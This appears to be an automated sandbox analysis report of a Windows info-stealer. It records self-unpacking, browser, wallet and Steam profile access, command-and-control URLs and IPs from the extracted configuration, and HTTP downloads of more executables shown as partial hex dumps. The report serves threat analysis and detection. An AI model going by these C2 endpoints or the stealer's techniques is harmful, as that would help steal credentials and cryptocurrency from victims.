Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe	Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.72.79:443 -> 192.168.2.5:61302 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_004133C0

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 74MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor	URLs: http://85.28.47.31silence
Source: Malware configuration extractor	IPs: 185.215.113.19
Source: Malware configuration extractor	URLs: 185.215.113.9:9137

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:61197 -> 185.215.113.9:9137

Detected non-DNS traffic on DNS port

Source: global traffic	TCP traffic: 192.168.2.5:55731 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:60231 -> 1.1.1.1:53

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 